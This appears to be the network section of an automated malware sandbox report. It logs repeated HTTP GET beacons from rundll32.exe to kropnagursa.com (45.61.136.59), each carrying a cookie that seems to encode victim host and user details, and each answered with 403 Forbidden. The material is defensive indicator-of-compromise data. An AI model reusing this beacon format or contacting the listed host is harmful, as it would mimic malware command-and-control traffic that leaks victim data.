                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:17.136337996 CET2271INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            128192.168.2.44982445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:17.619076014 CET2272OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:17.784212112 CET2272INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            129192.168.2.44982545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:18.547102928 CET2273OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:18.712178946 CET2273INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:18 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            13192.168.2.44970945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:06.774797916 CET2124OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:06.939448118 CET2124INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            130192.168.2.44982645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:19.034550905 CET2274OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:19.199563980 CET2275INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:19 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            131192.168.2.44982745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:19.514789104 CET2275OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:19.683420897 CET2276INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:19 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            132192.168.2.44982845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:20.004775047 CET2277OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:20.178649902 CET2277INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            133192.168.2.44982945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:20.481303930 CET2278OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:20.646198034 CET2278INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            134192.168.2.44983045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:21.123419046 CET2279OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:21.288248062 CET2280INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:21 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            135192.168.2.44983145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:21.896770000 CET2280OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:22.061476946 CET2281INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:21 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            136192.168.2.44983245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:22.367109060 CET2282OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:22.531788111 CET2282INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            137192.168.2.44983345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:22.852247000 CET2283OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:23.020139933 CET2283INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            138192.168.2.44983445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:23.402472019 CET2284OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:23.570168018 CET2285INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            139192.168.2.44983545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:24.167668104 CET2286OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:24.332689047 CET2286INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            14192.168.2.44971045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:07.302376986 CET2125OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:07.467369080 CET2126INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:07 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            140192.168.2.44983645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:24.647169113 CET2287OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:24.815380096 CET2287INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
